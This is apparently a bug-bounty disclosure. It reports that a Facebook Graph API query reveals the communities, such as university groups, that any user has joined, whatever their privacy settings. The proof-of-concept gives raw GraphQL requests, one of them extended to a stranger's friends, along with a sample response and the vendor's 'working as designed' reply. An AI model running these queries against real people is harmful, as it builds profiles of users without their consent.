Reveal Communities for Anyone on Facebook

It’s possible to find out the communities for any user on Facebook.

Impact

One can use this information to infer the universities anyone attended, regardless of the “School” section of their profile and its privacy settings, as long as they have joined such communities.

This is potentially a privacy risk.

Proof-of-Concept

Server Request

HTTP POST /v2.12/graphql
Host: graph.facebook.com
q=node(USER_ID){communities}

Server Response

{
  "100000000000000": {
    "communities": {
      "nodes": [{
        "name": "Some University",
        "url": "https://www.facebook.com/groups/<some university>/",
        "id": "3000000000000000"
      }]
    }
  }
}

To make it worse, it can be scaled up to query the communities of a complete stranger’s friends:

Server Request

HTTP POST /v2.12/graphql
Host: graph.facebook.com
q=node(USER_ID){friends{nodes{communities}}}

Timeline

2018-03-09: Report Submitted

2018-03-10: Report Marked as “Informative”, due to:

The behavior described in this report appears to be working as designed.